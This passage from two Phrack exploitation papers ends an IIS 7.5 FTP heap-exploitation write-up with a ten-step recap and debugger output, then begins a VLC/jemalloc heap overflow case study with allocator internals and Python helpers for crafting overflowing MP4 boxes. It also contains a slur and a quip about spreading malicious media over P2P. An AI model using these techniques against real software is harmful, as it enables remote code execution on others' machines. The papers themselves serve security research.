was truly asynchronous ;). FTP, being a line-based protocol, requires an
|
|
end of line / end of command delimiter. The server will actually wait to
|
|
process the command until it has received the entire line [6].
|
|
|
|
Perhaps a FTP_SESSION object that is associated with a FTP_COMMAND could be
|
|
overwritten, leading to control of a virtual function call. Step tracing
|
|
was used throughout FTP_COMMAND::WriteResponseWithErrorTextAndLog and ended
|
|
up at the FTP_SESSION::Log() function. This function contained multiple
|
|
virtual function calls such as:
|
|
|
|
.text:0E0761C4 mov ecx, [edi+3D8h]
|
|
.text:0E0761CA lea eax, [ebp+var_1B4]
|
|
.text:0E0761D0 push eax ; int
|
|
.text:0E0761D1 push [ebp+dwFlags] ; CodePage
|
|
.text:0E0761D7 mov eax, [ecx]
|
|
.text:0E0761D9 call dword ptr [eax+18h]
|
|
|
|
Now that there is a potential known function pointer in memory to be
|
|
overwritten, how can it be called? Surprisingly it was quite simple. By
|
|
leaving the trailing '\n' off the end of a command, setting up the heap,
|
|
and then sending the end of line delimiter, a call to "call dword ptr
|
|
[eax+18h]" with full control of EAX could be triggered.
|
|
|
|
0:006> r
|
|
eax=43434343 ebx=013f2a60 ecx=0145dc98 edx=0104f900 esi=013dfb98
|
|
edi=013f2a60
|
|
eip=70b661d9 esp=0104f690 ebp=0104f984 iopl=0 nv up ei pl zr na pe nc
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
|
ftpsvc!FTP_SESSION::Log+0x16b:
|
|
70b661d9 ff5018 call dword ptr [eax+18h] ds:0023:4343435b=????????
|
|
|
|
0:006> k
|
|
ChildEBP RetAddr
|
|
0104f984 70b6a997 ftpsvc!FTP_SESSION::Log+0x16b
|
|
0104fa30 70b6ee86
|
|
ftpsvc!FTP_COMMAND::WriteResponseWithErrorTextAndLog+0x188
|
|
0104fa48 70b66051 ftpsvc!FTP_COMMAND::Process+0xd1
|
|
0104fa88 70b676c7 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
|
|
0104faf0 70b6772a ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
|
|
0104fafc 70b3f182 ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
|
|
0104fb08 70b556e6
|
|
ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
|
|
|
|
Tracing the function during non-exploitation attempts revealed that the
|
|
function was attempting to get the username (if one existed) for logging
|
|
purposes.
|
|
|
|
1b561d9 ff5018 call dword ptr [eax+18h]
|
|
ds:0023:71b23a38={ftpsvc!USER_SESSION::QueryUserName (71b37823)}
|
|
|
|
Note: Again, this wasn't directly obvious by looking at the function. There
|
|
was quite a bit of static and dynamic analysis to determine the function's
|
|
usefulness.
|
|
|
|
Although the ability to spray the heap with FTP_COMMAND and FTP_SESSION
|
|
objects is possible, it is not as reliable as originally expected. Many
|
|
factors such as number of connections, the low fragmentation heap setup
|
|
(i.e. number of cores on the server) and many others come into play when
|
|
attempting to exploit this vulnerability.
|
|
|
|
For example, the amount of LFH chunks and the number of connections to the
|
|
server ended up having quite an effect on the reliability of the exploit,
|
|
which hovered around 60%. These both contributed to which address the
|
|
misaligned allocation pointed to and the contents of that memory.
|
|
|
|
|
|
--[ 8 - Conclusion
|
|
|
|
Although Microsoft and many others claimed that this vulnerability would be
|
|
impossible to exploit for code execution, this paper shows that with the
|
|
correct knowledge and enough determination, impossible turns to difficult.
|
|
|
|
To recap the exploitation process:
|
|
|
|
1) Figure out the vulnerability
|
|
|
|
2) Familiarize oneself with how heap memory is managed
|
|
|
|
3) Obtain in-depth knowledge of the operating system's memory managers
|
|
|
|
4) Prime the LFH to a semi-deterministic state
|
|
|
|
5) Send a request to overflow an adjacent chunk on the LFH
|
|
|
|
6) Create numerous connections in an attempt to populate the heap with
|
|
FTP_SESSION objects; which will create USER_SESSION objects as well
|
|
|
|
7) Send an unfinished request on the previously created connections
|
|
|
|
8) Make 3 allocations from the LFH for same size as your overflowable
|
|
chunk
|
|
|
|
a. 1st == Allocate and overflow into next chunk
|
|
|
|
b. 2nd == FreeEntryOffset will be set to 0xFFFF
|
|
|
|
c. 3rd == Allocation will (hopefully) point to memory which points
|
|
to a FTP_SESSION object containing a USER_SESSION class;
|
|
completely overwriting the function pointer in memory
|
|
|
|
9) Finish the command from the connection pool by sending a trailing
|
|
'\n', which in turn calls the OverlappedCompletionRoutine(),
|
|
therefore calling the FTP_SESSION::Log() function in the process
|
|
|
|
10) This will obtain EIP with multiple registers pointing to
|
|
user-controlled data. From there ASLR and DEP will need to be
|
|
subverted to gain code execution. Take a look at
|
|
DATA_STREAM_BUFFER.Size, which will determine how many bytes are
|
|
sent back to a user in a response
|
|
|
|
Although full arbitrary code execution wasn't achieved in the exploit, it
|
|
still proves that a remote attacker can potentially gain control over EIP
|
|
via a remote unauthenticated FTP connection that can be used to subvert the
|
|
security posture of the entire system, instead of limiting the scope to a
|
|
denial of service.
|
|
|
|
The era of simple exploitation is behind us and more exploitation
|
|
primitives must be used when developing modern exploits. By having a strong
|
|
foundation of operating system knowledge and exploitation techniques, you,
|
|
too, can turn impossible bugs into exploitable ones.
|
|
|
|
|
|
--[ 9 - References
|
|
|
|
[1] - Preventing the exploitation of user mode heap corruption
|
|
vulnerabilities
|
|
(http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-
|
|
exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx)
|
|
|
|
[2] - Understanding the Low Fragmentation Heap
|
|
(http://illmatics.com/Understanding_the_LFH.pdf)
|
|
|
|
[3] - Windows 7 IIS 7.5 FTPSVC Denial Of Service
|
|
(http://packetstormsecurity.org/files/96943/
|
|
Windows-7-IIS-7.5-FTPSVC-Denial-Of-Service.html)
|
|
|
|
[4] - Assessing an IIS FTP 7.5 Unauthenticated Denial of Service
|
|
Vulnerability
|
|
(http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-
|
|
ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx)
|
|
|
|
[5] - The Telnet Protocol
|
|
(http://support.microsoft.com/kb/231866)
|
|
|
|
[6] - Synchronization and Overlapped Input and Output
|
|
(http://msdn.microsoft.com/en-us/library/windows/desktop/
|
|
ms686358(v=vs.85).aspx)
|
|
|
|
--[ 10 - Exploit (thing.py)
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0d of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------=[ The Art of Exploitation ]=-----------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Exploiting VLC ]=---------------------------|
|
|
|=------------=[ A case study on jemalloc heap overflows ]=--------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ huku | argp ]=------------------------=|
|
|
|=--------------------=[ {huku,argp}@grhack.net ]=---------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
--[ Table of contents
|
|
|
|
1 - Introduction
|
|
1.1 - Assumptions
|
|
2 - Notes on jemalloc magazines
|
|
2.1 - Your heap reversed
|
|
2.2 - Your reversed heap reversed again
|
|
2.3 - Sum up of jemalloc magazine facts
|
|
3 - 'MP4_ReadBox_skcr()' heap overflow vulnerability
|
|
3.1 - MP4 file format structure
|
|
3.2 - Vulnerability details
|
|
3.3 - Old is gold; 'unlink()' style ftw
|
|
3.4 - Controlling 'p_root' data
|
|
3.5 - MP4 exploitation sum up
|
|
4 - Real Media 'DemuxAudioSipr()' heap overflow vulnerability
|
|
4.1 - VLC as a transcoder
|
|
4.2 - RMF? What's that?
|
|
4.3 - Vulnerability details
|
|
4.4 - 'p_blocks' all over the place
|
|
4.5 - RMF summary
|
|
5 - Building a reliable exploit
|
|
5.1 - Overall process
|
|
5.2 - Detecting 'p_root' address candidates
|
|
6 - Demonstration
|
|
7 - Limitations
|
|
8 - Final words
|
|
9 - References
|
|
10 - T3h l337 c0d3z
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
The idiom 'exploitation is an art' has been written in Phrack so many
|
|
times that it has probably ended up sounding cliche. With the emergence
|
|
of ASLR, NX, stack cookies, 'unlink()' protections and so on, exploit
|
|
writers seem to have realized the value of their code and have stopped
|
|
sharing their work with ugly faggots (you know who you are). Just have
|
|
a look at the various mailing lists and exploit archives; even the tons
|
|
of Linux kernel exploits found there are almost trash. Obviously it's not
|
|
the exploit writers that have lost their abilities; it's probably because
|
|
they don't care to share fully weaponized code (that's only a privilege of
|
|
people who pay for [censored] or [censored] lulz). The fact that working
|
|
exploits have stopped being released doesn't necessarily mean that the
|
|
underground has stopped their development. Although there's no way for
|
|
us to know, we believe we would all be amazed if we were to have even a
|
|
glimpse of what the underground has to offer (watch and learn: [1], [2]).
|
|
|
|
In order to develop the exploit presented in this article, we spent about
|
|
a month of continuous late nights in front of ugly terminals, eating junk
|
|
and taking breaks only to piss and shit (funny times). We managed to
|
|
develop a reliable local exploit for VLC. By 'almost' we mean that it is
|
|
possible to make our code 100% reliable but some work is still required;
|
|
we wish we had more time but Phrack had to be released. More details
|
|
on how to extend our code and bypass the limitations that confine its
|
|
reliability are given at a later section. It would probably be a fun
|
|
pastime for someone to continue from where we left off; it's not that
|
|
hard after all the bullshit we had to face. We hope to show you why
|
|
developing an exploit nowadays requires hard work, dedication and at
|
|
least one memleak ;)
|
|
|
|
This phile was at first meant to be part of our jemalloc research also
|
|
presented in this Phrack issue. Nevertheless, the Phrack staff honored us
|
|
by asking if we were willing to write a separate text with an in-depth
|
|
analysis of all that voodoo we had to perform. Readers might agree that
|
|
VLC is not the most exotic target one can come up with, but we decided
|
|
not to disclose any 0day vulnerabilities and keep it going with a list
|
|
of already published material, found by carefully looking for advisories
|
|
tagged as 'heap based overflows' (we could have googled for 'potential
|
|
DoS' as well, since it usually means ring0 access ;). Keep in mind that
|
|
we wouldn't like to present a vulnerability that would be trivial to
|
|
exploit. We were looking for a target application with a large codebase;
|
|
VLC and Firefox were our primary candidates. We finally decided to deal
|
|
with the first. The result was a local exploit that does not require
|
|
the user to give any addresses; it can figure out everything by itself.
|
|
|
|
|
|
----[ 1.1 - Assumptions
|
|
|
|
For the sake of writing this article...
|
|
|
|
1 - We assume that the attacker has local access on a server running VLC.
|
|
The VLC instance must have at least one of its several control interfaces
|
|
enabled (HTTP via --extraintf, RC via --rc-host or --rc-unix), that
|
|
will be used to issue media playback requests to the target and make
|
|
the whole process interactive, that is VLC should be running in 'daemon'
|
|
mode. Most people will probably think that those control interfaces can
|
|
also be used to perform a remote attack; they are right. Although, the
|
|
MP4 vulnerability exploited in this article cannot be used for remote
|
|
exploitation, developing a reliable remote exploit is, indeed, feasible
|
|
and in fact, it's just a matter of modifying the attached code.
|
|
|
|
Note: Remote exploitation using MP4 files can be performed by streaming
|
|
MP4 data to the VLC server. Unfortunately, MP4 streams are handled by
|
|
libffmpeg while MP4 files by VLC's custom MP4 demuxer. Don't get us
|
|
wrong, we don't believe that ffmpeg is bug-free; it might be vulnerable
|
|
to the exact same flaw, we just didn't have the time to investigate
|
|
it further.
|
|
|
|
2 - VLC cannot be run as root, so, don't expect uid 0 shells. We will
|
|
only try to stress the fact that some people will go to great lengths
|
|
to have your ass in their plate. Hacking is all about information,
|
|
the more information the easier for you to elevate to root.
|
|
|
|
3 - We assume our target is an x86 machine running FreeBSD-8.2-RELEASE,
|
|
the exact same version we used during our main jemalloc research.
|
|
|
|
4 - Last but not least, we assume you have read and understood our
|
|
jemalloc analysis. We don't expect you to be a jemalloc ninja, but
|
|
studying our work the way you do your morning newspaper will not get
|
|
you anywhere either ;)
|
|
|
|
|
|
--[ 2 - Notes on jemalloc magazines
|
|
|
|
----[ 2.1 - Your heap reversed
|
|
|
|
In our main jemalloc research we discussed the use of 'magazines' as a
|
|
thread contention avoidance mechanism. Briefly, when a process spawns
|
|
multiple threads, a global variable called '__isthreaded' is set to
|
|
true. This variable, which can be accessed via the 'extern' storage
|
|
class specifier by any application, instructs jemalloc to initialize
|
|
thread-local data structures for caching heap allocations. Those
|
|
data structures, the so called 'magazines', are allocated and populated
|
|
in a lazy fashion. In the case of 'malloc()', a threaded application
|
|
will eventually reach the 'if' clause shown below ('MALLOC_MAG' and
|
|
'opt_mag' are enabled by default).
|
|
|
|
|
|
#ifdef MALLOC_MAG
|
|
static __thread mag_rack_t *mag_rack;
|
|
#endif
|
|
|
|
...
|
|
|
|
static inline void *
|
|
arena_malloc(arena_t *arena, size_t size, bool zero)
|
|
{
|
|
...
|
|
|
|
if(size <= bin_maxclass) {
|
|
#ifdef MALLOC_MAG
|
|
if(__isthreaded && opt_mag) {
|
|
mag_rack_t *rack = mag_rack;
|
|
if(rack == NULL) {
|
|
rack = mag_rack_create(arena);
|
|
if(rack == NULL)
|
|
return (NULL);
|
|
mag_rack = rack;
|
|
}
|
|
return(mag_rack_alloc(rack, size, zero));
|
|
}
|
|
...
|
|
#endif
|
|
|
|
...
|
|
}
|
|
|
|
|
|
The first point of interest is the '__thread' classifier in the
|
|
declaration of 'mag_rack'. This specifier instructs gcc/binutils to
|
|
make use of the, so called, TLS (Thread Local Storage) mechanism. The
|
|
'__thread' declarations are grouped and then act as a prototype for
|
|
the initialization of each thread. Simply put, each thread spawned via
|
|
'pthread_create()' will inherit its own private copy of 'mag_rack'
|
|
initialized to 'NULL' since it's also declared as 'static'. Access to
|
|
thread local memory is transparent to the user; each time 'mag_rack'
|
|
is referenced, the runtime automatically figures out where the thread's
|
|
private memory can be found.
|
|
|
|
It's now easier to understand how 'arena_malloc()' will act once
|
|
'__isthreaded' and 'opt_mag' are set to true. First the existing
|
|
'magazine rack' pointer is checked; if NULL, 'mag_rack_create()' will
|
|
be called to (a) initialize the 'mag_rack_t' structure and (b) populate
|
|
it with preallocated memory regions for the bin that corresponds to the
|
|
requested size (notice that magazine racks are only used for bin-sized
|
|
allocations; larger ones follow another code path).
|
|
|
|
Assume a random thread in a random application calls 'malloc(4)'. The
|
|
instruction pointer will soon reach a call to 'mag_rack_alloc(mag_rack,
|
|
4, false);'.
|
|
|
|
|
|
static inline void *
|
|
mag_rack_alloc(mag_rack_t *rack, size_t size, bool zero)
|
|
{
|
|
void *ret;
|
|
bin_mags_t *bin_mags;
|
|
mag_t *mag;
|
|
size_t binind;
|
|
|
|
binind = size2bin[size]; /* (1) */
|
|
...
|
|
|
|
bin_mags = &rack->bin_mags[binind]; /* (2) */
|
|
|
|
mag = bin_mags->curmag; /* (3) */
|
|
if (mag == NULL) {
|
|
/* Create an initial magazine for this size class. */
|
|
|
|
mag = mag_create(choose_arena(), binind);
|
|
|
|
bin_mags->curmag = mag;
|
|
mag_load(mag);
|
|
}
|
|
|
|
ret = mag_alloc(mag);
|
|
...
|
|
|
|
return (ret);
|
|
}
|
|
|
|
|
|
The input size is converted to a bin index (1), for a size of 4,
|
|
'binind' will be set to 0. Each magazine rack has its own set of bins
|
|
which are private to the thread (2). Variable 'mag' is set to point to
|
|
the rack's 'magazine' for this specific bin size (3). A 'magazine' is a
|
|
simple array of void pointers, called 'rounds[]', that holds addresses
|
|
of preallocated memory regions of equal size. Function 'mag_load()' is
|
|
called to initialize it. Here's where things start to get more interesting
|
|
and may influence the exploitation process in a significant way. Skimming
|
|
through 'mag_load()' reveals the following:
|
|
|
|
|
|
static void
|
|
mag_load(mag_t *mag)
|
|
{
|
|
...
|
|
arena = choose_arena(); /* (1) */
|
|
bin = &arena->bins[mag->binind];
|
|
|
|
for (i = mag->nrounds; i < max_rounds; i++) {
|
|
...
|
|
|
|
round = arena_bin_malloc_easy(arena, bin, run); /* (2) */
|
|
...
|
|
|
|
mag->rounds[i] = round;
|
|
}
|
|
...
|
|
|
|
mag->nrounds = i;
|
|
...
|
|
}
|
|
|
|
|
|
Depending on the build configuration, 'choose_arena()' (1) may statically
|
|
assign a thread to the same arena or dynamically to a different one
|
|
every time it gets called. No matter what the assignment process looks
|
|
like, we can see that at (2), the 'rounds[]' array is populated by a
|
|
normal call to 'arena_bin_malloc_easy()' (or 'arena_bin_malloc_hard()');
|
|
the function that a process would call had it not been threaded. Since
|
|
the heap internals work in a purely deterministic way (for now ignore
|
|
the inherent non-determinism regarding thread scheduling), we can be
|
|
quite sure that the regions whose addresses are stored in 'rounds[]'
|
|
will probably be contiguous. Assuming no holes are found in the heap
|
|
(which is easy to assume since an experienced exploit developer knows
|
|
how to fill them), the regions returned by 'arena_bin_malloc_xxx()'
|
|
will be in increasing memory addresses as shown in the following figure.
|
|
|
|
|
|
Run (PAGE_SIZE) that services 4byte allocations
|
|
.-------.-------.-----.-------.
|
|
0xdeadb000 | reg 1 | reg 2 | ... | reg N |
|
|
'-------'-------'-----'-------'
|
|
^ ^ ^
|
|
| .-' '--.
|
|
| | |
|
|
.-----.-----.-----.-----.
|
|
| 0 | 1 | ... | M |
|
|
'-----'-----'-----'-----'
|
|
rounds[] array
|
|
|
|
|
|
Once initialization is complete, we return back to 'mag_rack_alloc()'
|
|
that calls 'mag_alloc()' to pick an entry in the 'rounds[]' array to
|
|
give to the user.
|
|
|
|
|
|
static inline void *
mag_alloc(mag_t *mag) {
|
|
if (mag->nrounds == 0)
|
|
return (NULL);
|
|
|
|
mag->nrounds--; /* (1) */
|
|
|
|
return (mag->rounds[mag->nrounds]); /* (2) */
|
|
}
|
|
|
|
|
|
If this is the first allocation taking place in the thread, 'mag_alloc()'
|
|
will return the last element of the 'rounds[]' array. The 'malloc(4)'
|
|
calls that may follow will be served by the exact same magazine with
|
|
regions in decreasing memory addresses! That is, magazines are populated
|
|
in a 'forward' fashion but consumed in a 'backward' one so that if you
|
|
allocate, for example, 3 regions, their memory order will be 321 instead
|
|
of 123 :)
|
|
|
|
|
|
----[ 2.2 - Your reversed heap reversed again
|
|
|
|
As explained in our main jemalloc article, '__isthreaded' is set to true
|
|
after a successful call to 'pthread_create()' (in fact, it is enabled by
|
|
libthr) and remains as such until the end of the program's lifetime, that
|
|
is, joining the threads will not set '__isthreaded' to 0. Consequently,
|
|
once the magazine racks have been initialized, jemalloc will keep using
|
|
them no matter what the number of active threads is.
|
|
|
|
As explained in the previous section, continuous allocations serviced by
|
|
magazines, may return memory regions in decreasing memory addresses. We
|
|
keep using the word 'may' because this is not always the case. Consider
|
|
the following code snippet which we advise that you read carefully:
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <pthread.h>
|
|
#include <unistd.h>
|
|
|
|
extern int __isthreaded;
|
|
void *allocs[10];
|
|
|
|
void start_allocs(void) {
|
|
int i;
|
|
printf("Allocating regions\n");
|
|
for(i = 0; i < 10; i++) {
|
|
allocs[i] = malloc(192);
|
|
printf("%p\n", allocs[i]);
|
|
}
|
|
return;
|
|
}
|
|
|
|
void free_allocs(void) {
|
|
int i;
|
|
printf("Freeing the regions\n");
|
|
for(i = 0; i < 10; i++)
|
|
free(allocs[i]);
|
|
return;
|
|
}
|
|
|
|
void free_allocs_rev(void) {
|
|
int i;
|
|
printf("Freeing the regions in reverse order\n");
|
|
for(i = 10 - 1; i >= 0; i--)
|
|
free(allocs[i]);
|
|
return;
|
|
}
|
|
|
|
void *thread_runner(void *p) {
|
|
int rev = *(int *)p;
|
|
|
|
sleep(1);
|
|
|
|
if(rev)
|
|
free_allocs_rev();
|
|
else
|
|
free_allocs();
|
|
|
|
start_allocs();
|
|
return NULL;
|
|
}
|
|
|
|
int main(int argc, char *argv[]) {
|
|
pthread_t tid;
|
|
int rev = 0;
|
|
|
|
if(argc > 1)
|
|
rev = atoi(argv[1]);
|
|
|
|
start_allocs();
|
|
pthread_create(&tid, NULL, thread_runner, (void *)&rev);
|
|
pthread_join(tid, NULL);
|
|
return 0;
|
|
}
|
|
|
|
|
|
There are three important functions in the code above; 'start_allocs()'
|
|
which allocates 10 memory regions that will be serviced by bin-192,
|
|
'free_allocs()' that frees the aforementioned regions in a 'forward'
|
|
fashion and 'free_allocs_rev()' that will do the same thing but in reverse
|
|
order. The 'allocs[]' array holds pointers to allocated regions. On
|
|
startup, 'main()' will call 'start_allocs()' to populate 'allocs[]'
|
|
and then will fire up a thread that will free those regions. Carefully
|
|
looking at jemalloc's code, reveals that even on deallocation, a new
|
|
magazine rack will be allocated and the regions being freed will be
|
|
eventually inserted in the thread's magazine for that specific size class!
|
|
You can think of that as the memory regions changing ownership; regions
|
|
belonging to the main thread, become property of the new thread started by
|
|
'pthread_create()'.
|
|
|
|
Once the new thread calls 'start_allocs()', the exact same regions that
|
|
were previously freed will eventually be returned to the caller. The
|
|
order by which they will be returned, depends on the way they were freed
|
|
in the first place. Let's run our test program above by passing it the
|
|
value 0 in 'argv[1]'; this will ask the thread to free the regions in
|
|
the normal way.
|
|
|
|
|
|
[hk@lsd ~]$ ./test 0
|
|
Allocating regions
|
|
0x282070c0
|
|
0x28207180
|
|
0x28207240
|
|
0x28207300
|
|
0x282073c0
|
|
0x28207480
|
|
0x28207540
|
|
0x28207600
|
|
0x282076c0
|
|
0x28207780
|
|
Freeing the regions
|
|
Allocating regions
|
|
0x28207780
|
|
0x282076c0
|
|
0x28207600
|
|
0x28207540
|
|
0x28207480
|
|
0x282073c0
|
|
0x28207300
|
|
0x28207240
|
|
0x28207180
|
|
0x282070c0
|
|
|
|
|
|
As you can see, the calls to 'malloc()' performed by the thread, return
|
|
the regions in reverse order; this is very similar to what the previous
|
|
section explained. Now let's free the regions allocated by 'main()'
|
|
by calling 'free_allocs_rev()':
|
|
|
|
|
|
[hk@lsd ~]$ ./test 1
|
|
Allocating regions
|
|
0x282070c0
|
|
0x28207180
|
|
0x28207240
|
|
0x28207300
|
|
0x282073c0
|
|
0x28207480
|
|
0x28207540
|
|
0x28207600
|
|
0x282076c0
|
|
0x28207780
|
|
Freeing the regions in reverse order
|
|
Allocating regions
|
|
0x282070c0
|
|
0x28207180
|
|
0x28207240
|
|
0x28207300
|
|
0x282073c0
|
|
0x28207480
|
|
0x28207540
|
|
0x28207600
|
|
0x282076c0
|
|
0x28207780
|
|
|
|
|
|
Interestingly, the regions are returned in the same order as they were
|
|
allocated. You can think of that as the 'rounds[]' array in 'mag_load()'
|
|
being reversed; the allocations are freed in the reverse order and
|
|
placed in 'rounds[]' but 'mag_alloc()' gives out regions in reverse
|
|
order too... Reverse + reverse = obverse ;)
|
|
|
|
So why is this important? Regions of a commonly used size (e.g. 64) are
|
|
usually allocated by a program before 'pthread_create()' is called. Once a
|
|
thread is created and '__isthreaded' is set to true, freeing those regions
|
|
may result in some thread becoming their master. Future allocations from
|
|
the thread in question, may return regions in the normal way rather than
|
|
in decreasing memory addresses as shown in the previous section. This
|
|
is a very important observation that an exploit coder must keep in mind
|
|
while targeting FreeBSD applications or any program utilizing jemalloc.
|
|
|
|
In the sections to follow, we will be dealing with two vulnerabilities;
|
|
one in the MP4 demuxer and one in the RMF parser. The first concerns
|
|
4-byte allocations, which are not that common. As a result, VLC, which
|
|
is a multithreaded application, will by default return such regions in
|
|
decreasing locations. On the contrary, the RMF vulnerability is related
|
|
to 192-byte regions, which, being larger, are more common. Several 192-byte
|
|
allocations may have been created or destroyed before 'pthread_create()'
|
|
is called and thus we cannot guarantee their re-allocation order. It
|
|
is for this purpose that we have to employ more tricks for the latter
|
|
vulnerability.
|
|
|
|
|
|
----[ 2.3 - Sum up of jemalloc magazine facts
|
|
|
|
To sum up:
|
|
|
|
1 - While in glibc and dlmalloc you were used to seeing new memory
|
|
regions getting allocated in higher addresses, this is not the case with
|
|
jemalloc. If magazines are enabled, continuous allocations may return
|
|
regions in decreasing memory order. It's quite easy for anyone to verify
|
|
by pure observation.
|
|
|
|
2 - Don't get 1 for granted. Depending on the order the allocations were
|
|
performed, even if thread magazines are enabled, memory regions may end
|
|
up being returned in the normal order. This, for example, can happen when
|
|
memory regions that were allocated before the first thread is spawned,
|
|
are eventually freed by one of the threads.
|
|
|
|
3 - Always remember that jemalloc does not make use of meta-information
|
|
embedded within the regions themselves. The fact that there are no
|
|
inline metadata bordering the end user allocations sounds like good
|
|
news. It's both a wise design choice and a powerful primitive in the
|
|
attacker's hands.
|
|
|
|
4 - For i = 0 ... 10 goto 1
|
|
|
|
|
|
--[ 3 - 'MP4_ReadBox_skcr()' heap overflow vulnerability
|
|
|
|
----[ 3.1 - MP4 file format structure
|
|
|
|
The very first vulnerability we will be analyzing is a heap overflow
|
|
within VLC's MP4 demuxer [4]. As stated earlier, VLC's builtin MP4
|
|
demuxer is only used for local files, as opposed to network streams that
|
|
go through an alternate code path, ending up being handled by libffmpeg
|
|
code. Properly parsing a media file is a very cumbersome task involving
|
|
complex sanity checks. File format parsers and especially those related
|
|
to media files have been the root cause of many vulnerabilities in the
|
|
past (remember all that 'RIAA employing Gobbles to pwn media players' [3]
|
|
bullshit?). We are definitely not experts when it comes to multimedia
|
|
formats; we will only take a look at how an MP4 file is structured, no
|
|
details will be given on signal processing and encoding/decoding stuff,
|
|
since the actual vulnerability is by no means related to the mathematics
|
|
involved in the MP4 specifications (we imagine that there are juicy bugs
|
|
there too ;)
|
|
|
|
Briefly, an MP4 file looks like a tree of nodes serialized in a depth
|
|
first order with the root node coming first (people that have experience
|
|
with DWARF will probably notice the similarities). Tree nodes are split
|
|
in two categories: containers and leaf nodes, also known as 'boxes',
|
|
with the latter holding the media information (both data and metadata) and
|
|
the former playing the role of logically connecting its children. There
|
|
are several types of boxes (frma, skcr, dref, url, urn, etc.) as well as
|
|
several types of containers (ftyp, udta, moov, wave, etc.).
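
On disk each node follows the standard ISO base media layout: a 32-bit
big-endian size covering the 8-byte header plus the payload, a 4-byte type
tag, and then the payload itself; a container's payload is simply its
children concatenated. The tiny Python sketch below (helper names are ours,
but this is roughly what the attached mp4.py does) is enough to build
arbitrary trees:


import struct

def box(fourcc, payload=b""):
    # 32-bit big-endian size (header included) + 4-byte type + payload
    assert len(fourcc) == 4
    return struct.pack(">I", 8 + len(payload)) + fourcc + payload

def container(fourcc, children):
    # a container is just a box whose payload is its children, in the
    # order we want them parsed (and therefore allocated)
    return box(fourcc, b"".join(children))

open("demo.mp4", "wb").write(container(b"moov", [box(b"free", b"A" * 16)]))


The parsing order matters, as we will see shortly, because it dictates the
order of the demuxer's heap allocations.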
|
|
|
|
Easter egg: We believe URLs embedded within MP4 meta-information,
|
|
which are normally used to fetch artist names, cover artwork and so on,
|
|
may also be used for performing web attacks. Let us know if you have
|
|
experience on this ;) Dear Anonymous, did you know that sharing such
|
|
media files in P2P networks may be used for more uniformly distributed
|
|
attacks?
|
|
|
|
Each tree node, whether a container or a box, is represented by a
|
|
structure called 'MP4_Box_t' defined in modules/demux/mp4/libmp4.h:970:
|
|
|
|
|
|
typedef struct MP4_Box_s {
|
|
off_t i_pos; /* Offset of node in the file */
|
|
uint32_t i_type; /* Node type */
|
|
...
|
|
uint64_t i_size; /* Size of data including headers etc */
|
|
MP4_Box_data_t data; /* A union of pointers; depends on 'i_type' */
|
|
|
|
/* Tree related pointers */
|
|
struct MP4_Box_s *p_father;
|
|
struct MP4_Box_s *p_first;
|
|
struct MP4_Box_s *p_last;
|
|
struct MP4_Box_s *p_next;
|
|
} MP4_Box_t;
|
|
|
|
|
|
The vulnerability lies in the function responsible for parsing boxes of
|
|
type 'skcr'.
|
|
|
|
|
|
----[ 3.2 - Vulnerability details
|
|
|
|
For each box type, a dispatch table is used to call the appropriate
|
|
function that handles its contents. For 'skcr' boxes, 'MP4_ReadBox_skcr()'
|
|
is responsible for doing the dirty work.
|
|
|
|
|
|
/* modules/demux/mp4/libmp4.c:2248 */
|
|
static int MP4_ReadBox_skcr(..., MP4_Box_t *p_box) {
|
|
MP4_READBOX_ENTER(MP4_Box_data_frma_t);
|
|
|
|
MP4_GET4BYTES(p_box->data.p_skcr->i_init);
|
|
MP4_GET4BYTES(p_box->data.p_skcr->i_encr);
|
|
MP4_GET4BYTES(p_box->data.p_skcr->i_decr);
|
|
|
|
...
|
|
}
|
|
|
|
|
|
'MP4_READBOX_ENTER()' is a macro that, among other things, will allocate a
|
|
structure of the given type and store it in 'p_box->data.p_data'. Macro
|
|
'MP4_GET4BYTES()' will just read 4 bytes off the input stream and store
|
|
it in the region pointed by the argument. While messing with the VLC
|
|
internals, it's good to keep in mind that integers in MP4 files (as well
|
|
as other media types) are in big endian order.
|
|
|
|
The vulnerability is kind of obvious; instead of allocating a
|
|
'MP4_Box_data_skcr_t' structure, 'MP4_ReadBox_skcr()' allocates
|
|
an 'MP4_Box_data_frma_t', but later on, the pointer is assumed to
|
|
point to a struct of the first type (notice how 'MP4_GET4BYTES()' is
|
|
used; the 'data' union of the 'MP4_Box_t' is assumed to point to the
|
|
correct structure). 'MP4_Box_data_frma_t', on x86, is 4 bytes long but
|
|
'MP4_ReadBox_skcr()' will treat it as having a size of 12 bytes (the
|
|
real size of 'MP4_Box_data_skcr_t'), resulting in 8 bytes being written
|
|
off the heap region boundaries.
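
From the attacker's side an 'skcr' box therefore boils down to three
big-endian dwords (assuming, as the code above suggests, that the demuxer
consumes them right after the common box header): the first one fits inside
the undersized 'frma' allocation, the other two are the 8 bytes that spill
into whatever jemalloc happened to place next to it. A sketch, reusing the
box() helper from the previous section:


import struct

def skcr_box(i_init, i_encr, i_decr):
    # i_init stays inside the 4-byte 'frma' region; i_encr and i_decr are
    # written past its end, over the two adjacent 4-byte regions
    return box(b"skcr", struct.pack(">III", i_init, i_encr, i_decr))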
|
|
|
|
|
|
----[ 3.3 - Old is gold; 'unlink()' style ftw
|
|
|
|
The very first thing to note is the size of the victim structure (the
|
|
one being overflown). 'MP4_Box_data_frma_t' has a size of 4 bytes, so,
|
|
it is handled by jemalloc's bin for this specific size class (depending on
|
|
the variant, 4 may or may not be the smallest bin size). As a consequence,
|
|
